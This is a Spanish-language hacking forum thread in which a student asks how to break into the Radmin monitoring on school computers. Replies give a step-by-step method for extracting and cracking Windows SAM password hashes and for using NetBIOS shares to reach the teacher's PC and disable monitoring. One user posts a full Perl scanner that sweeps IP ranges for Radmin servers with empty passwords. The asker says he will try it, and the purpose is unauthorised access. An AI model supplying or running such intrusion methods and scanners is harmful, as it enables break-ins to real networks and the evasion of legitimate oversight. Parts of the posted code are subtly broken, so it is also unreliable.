PDA

Ver la versión completa : Radmin



boycot007
03-10-2006, 15:27
Que hay?!! ¿Alguien sabe si se puede crackear la contraseña de un servidor del radmin? Esque todos los ordenadores del insti estan conectados en red, con el fabuloso Radmin corriendo por ahì, supuestamente para poder vigilar a los alumnos :p
Graaciass

SxR
05-10-2006, 17:28
Pufff, desde un sniffer tipo CAIN hasta un bug del Radmin pasando por fuerza bruta... no hagas preguntas sin contestación clara pq verás cosas como lo que yo te contesto.

School
08-10-2006, 12:34
Existe un xploit para el radmin y tb para el vnc, sabiendo su ip entras sin pass :D las cosas que inventan jajaa.

S4lu2

LooKoo
16-10-2006, 20:42
Existe un xploit para el radmin y tb para el vnc, sabiendo su ip entras sin pass :D las cosas que inventan jajaa.

S4lu2


Que exploit ?

CrAcKzMe
17-10-2006, 00:51
School, ¿te refieres al artículo sobre eludir la autentificación en VNC?

Un saludo.

KirtasH
17-10-2006, 07:33
el lo que quiere es conseguir sacas la pass del radmin, cuya pass,lógicamente, no sabe,(por lo que leo de sus post) en este post quiere saber cual es el exploit que quita la pass del radmin i en otro como usar fuerza bruta para sacarla....es así LooKoo¿?
Salu2
P.D: si es así pregunta las cosas de forma más clara!!

3nD_SuB
17-10-2006, 07:49
En mi instituto también corria todo por el radmin!
al principio estaba perdido, pero luego es bastante facil, hay muchísimas formas de ser administrador en el ordenador para después activar o desactivar radmin y demás cosas a tu gusto!
Nos daban a cada alumno un ordenador de cuenta limitada de nombre "alumnoN" (N = un numero natural) en el cual no podías instalar nada y te monitoreaban el pc y podian controlarte.
Pues bién ahora digo varias formas simples de conseguir administrador:

1º) Crackear SAM y Hashes, o bien desde el archivo SAM en "/windows/system32/config" [[cuyo archivo no podras manipular una vez arrancado el OS, utliza otros métodos para cogerlo como; enchufar otro hard disk como principal y copiarlo, como meter alguna version livecd de linux como knoppix y copiando SAM a algún diskete, o de alguna otra forma más...]] o bien mediante la vulnerabilidad con el PID del proceso "lsass.exe". Una vez obtenidas las hashes, se desencriptan, un buen programa es Jhon The Ripper que corre bajo Msdos y del cual recomiendo leer algún manual, desencriptadas las hashes te da entre ellas, la contraseña del admin.

2º) SIN SER MUY CANTOSO, Y utilizando recursos compartidos de NETBIOS, (suele funcionar) con un poco de ahinco conseguiras acceso al pc del profesor y desactivar radmin. No hace falta explicar NETBIOS (Recursos compartidos de windows), necesitas Msdos o algún programa con interface que actue sobre netbios; www.google.es y en caso de que haya una contraseña de por medio, algún programa de esos que hay miles sobre netbios!! en fi, una vez dentro del pc del profesor, desactiva el radmin sobre tí! ;)

Bueno, creo que me he explicado mas o menos bien... si teneis alguna duda postear, pero estas son cosas, que la mayoría ya sabeis :p

boycot007
17-10-2006, 12:50
Gracias 3nD_SuB, no caí en esa opción, aunque radmin puedo desactivarlo desde mi cuenta aunque no sea administrador, no quita esos privilegios.. probare con el Jhon haber que tal.
saludosss

School
17-10-2006, 14:09
Bueno aqui un crackeador del radmin en perl, espero que te sirva boycot007, salu2 :0=


#!/usr/bin/perl
use IO::Socket;


##################################################
# Radmin with empty password scanner
#
# usage: ./scan.pl 213.59.*.*
# thanx to Forb
# Coded by Satir ([email protected]) from CyberLords [cyberlords.net]
################################################## ##############################
#####

$|++;
use IO::Socket; ## ????? ??????

$pids=10; ## Count of threads
$port = 4899; ## Default port
$tout = 5; ## Default timeout
$log = 'scan.log'; ## Default logfile


$once=0;
$fatal=0;

if (@ARGV[0]=~/((.*)\.(.*)\.(.*)\.(.*))/) {
$netmask = $1;
$n1 = $2;
$n2 = $3;
$n3 = $4;
$n4 = $5;
}

quit("Incorrect port") if ($port=~/\D/);
quit("No hostmask given") unless $netmask;
check();

while(1) {
@ips=@ipz[$once..$once+$pids];
for ($i=0;$i<=$pids;$i++) {
unless($ips[$i]) {
killpidz();
exit print "Scan is complete\n";
}


if ($pid=fork()) {
push(@forked,$pid);
} else {
$res=check_radmin($ips[$i],$port);
logg($ips[$i],$res) if ($res ne 0);
exit;
}
}
$once+=$pids;
killpidz();
}

sub check {
for ($i=0;$i<=254;$i++) {
$ipi = $i;
if ($n2 ne '*') { $i = 254,$ipi = $n2 }
for ($j=0;$j<=254;$j++) {
$ipj = $j;
if ($n3 ne '*') { $j = 254,$ipj = $n3 }
for ($k=1;$k<=254;$k++) {
$ipk = $k;
if ($n4 ne '*') { $k = 254,$ipi = $n2 }
my($ipaddr) = "$n1\.$ipi\.$ipj\.$ipk";
chomp($ipaddr);
push(@ipz,$ipaddr);
}
}
}
}

sub quit {
my($reason)=@_;
print "$reason\n" if $reason;
exit;
}

sub logg {
my($ip,$ans)=@_;
open(LOGG,">>$log");
$str="NULL PASS!!!" if $ans eq 1;
$str="need pass." if $ans eq 2;

print LOGG "$ip:$port : $str\n";
close(LOGG);
}

sub killpidz {
foreach (@forked) {
chomp;
waitpid($_,0);
kill("TERM" => $_)
}
undef @forked;
}


sub check_radmin{
($host,$port)=@_;

$sock=IO::Socket::INET->new(PeerAddr => $host, PeerPort => $port, Photo => "tcp");

if($sock)
{
$sock->send("\x01\x00\x00\x00\x01\x00\x00\x00\x08\x08");
$sock->recv($data,1024);
close($sock);

@marks=split(//,$data);
foreach(@marks){
$string.=unpack('H8', $_);
}
if($string=~/a080/g){
return 1;
}
else{
return 2;
}

}else { return 0;}
}

3nD_SuB
17-10-2006, 14:50
digo yo que habrá que compilar ese código... :rolleyes: ¿no?

boycot007
17-10-2006, 15:55
Gracias school lo probaré, ya comentare los resultados :P

SxR
17-10-2006, 18:56
Compilar perl?

School
17-10-2006, 19:07
Compilar perl? jejeje

Active perl